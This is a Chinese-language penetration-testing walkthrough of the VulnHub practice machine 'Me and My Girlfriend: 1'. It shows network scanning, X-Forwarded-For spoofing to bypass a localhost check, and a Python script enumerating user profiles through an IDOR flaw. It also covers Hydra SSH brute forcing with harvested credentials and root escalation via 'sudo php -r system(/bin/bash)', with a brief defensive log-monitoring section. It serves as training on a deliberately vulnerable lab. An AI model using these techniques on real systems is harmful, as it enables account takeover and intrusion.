VulnHub靶机 Me and My Girlfriend: 1 实战:3步利用越权漏洞获取SSH凭证
VulnHub靶机实战越权漏洞与SSH凭证获取的三步攻击链靶机渗透测试的核心逻辑在网络安全实战中越权漏洞IDOR常被忽视却危害巨大。以VulnHub靶机Me and My Girlfriend: 1为例我们可构建一条从Web漏洞到系统权限的完整攻击链。不同于常规的漏洞扫描这种组合攻击更贴近真实渗透场景。关键攻击阶段伪造客户端IP绕过访问限制利用IDOR漏洞枚举用户凭证通过凭证复用获取SSH访问权限1. 环境侦察与访问控制绕过1.1 靶机发现与端口扫描使用Nmap进行基础网络侦察nmap -sn 192.168.183.0/24 -oG -发现靶机IP后进行服务扫描nmap -sV 192.168.183.135典型输出显示开放80(HTTP)和22(SSH)端口。1.2 HTTP头注入绕过地域限制当访问Web服务出现本地限制提示时可通过Burp Suite修改请求头X-Forwarded-For: 127.0.0.1或使用cURL直接测试curl -H X-Forwarded-For: 127.0.0.1 http://192.168.183.135注意现代系统应使用Forwarded标准头但旧系统仍广泛使用非标准的X-Forwarded-For2. 越权漏洞深度利用2.1 基础账户注册与测试注册测试账户如hacker/123登录后观察URL中的用户ID参数如user_id22.2 IDOR漏洞验证修改用户ID参数访问其他用户信息http://192.168.183.135/profile?user_id1漏洞特征对比表正常行为存在漏洞表现返回403错误返回目标用户数据显示空白页面显示完整用户资料跳转登录页保持当前会话2.3 自动化凭证收集使用Python脚本批量获取用户信息import requests base_url http://192.168.183.135/profile?user_id headers {X-Forwarded-For: 127.0.0.1} for user_id in range(1,10): response requests.get(f{base_url}{user_id}, headersheaders) if response.status_code 200: print(f[] User {user_id}: {response.text})3. 凭证复用与权限提升3.1 SSH爆破实战从收集到的用户信息中提取可能的账号密码组合alice:4lic3 abdikasepak:dorrrrr使用Hydra进行SSH爆破hydra -L users.txt -P passwords.txt ssh://192.168.183.135 -t 43.2 成功登录后的操作获取初始shell后ssh alice192.168.183.135执行基础信息收集find / -name *flag* 2/dev/null sudo -l3.3 通过PHP实现权限提升当发现sudo权限配置不当User alice may run the following commands on target: (ALL) NOPASSWD: /usr/bin/php利用PHP执行系统命令sudo php -r system(/bin/bash);权限提升方法对比方法适用场景风险等级Sudo滥用配置错误低SUID滥用错误权限中内核漏洞未打补丁高防御措施与检测方案开发层面实施严格的权限验证如RBAC使用UUID替代自增ID添加资源访问日志审计运维层面# 监控异常sudo使用 grep sudo /var/log/auth.log | grep -v COMMAND # 检查SSH爆破尝试 grep Failed password /var/log/auth.log攻击链可视化信息收集→ 2.漏洞利用→ 3.横向移动→ 4.权限提升每个阶段应保留完整操作记录建议使用如下命令记录会话script -q -c 命令 session.log在真实渗透测试中这种组合攻击成功率往往高于单一漏洞利用。关键在于理解业务逻辑与权限体系的薄弱环节而非依赖自动化工具。